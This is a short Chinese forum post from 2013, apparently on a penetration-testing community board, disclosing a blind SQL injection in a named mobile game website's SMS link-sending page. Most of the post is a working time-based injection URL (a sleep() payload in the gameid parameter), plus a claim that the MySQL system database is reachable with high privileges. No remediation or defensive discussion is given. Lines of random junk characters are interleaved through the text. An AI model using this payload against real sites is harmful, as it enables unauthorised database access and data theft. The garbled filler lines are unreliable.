中国网络渗透测试联盟
标题:
凤凰手机游戏网SQL盲注漏洞
[打印本页]
作者:
admin
时间:
2013-4-4 17:34
标题:
凤凰手机游戏网SQL盲注漏洞
简要描述:
* X1 b, L# f/ B9 L5 {' o9 f8 V$ v
凤凰手机游戏网,在填写手机号码发送push连接的地方存在sql盲注漏洞。
' {* V# n6 `, d& ]) ^7 g
- W q* ^! k! S
详细说明:
$ m3 S7 l- n/ X1 h
存在SQL盲注url:
1 {2 i3 G. N5 c4 X
fenghuang/game/game_send_sms.jsp?gameid=130221346000%27%20and%20sleep%282%29%3d%27&mo=1
6 L7 z* Q) a; \9 Y& T3 K3 n9 N
http://www.myhack58.com/Article/UploadPic/2013-4/2013411254849748.png
3 s% Y' f- ~3 T
http://www.myhack58.com/Article/UploadPic/2013-4/20134112545369314.png
1 {+ m7 N# x8 O
http://www.myhack58.com/Article/UploadPic/2013-4/20134112565766695.jpg
! I5 y ?' P7 ]/ i4 T
- L# R: |8 L \- [! ?% W" P+ a
能看到mysql系统数据库,看来user权限应该很高的。。
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2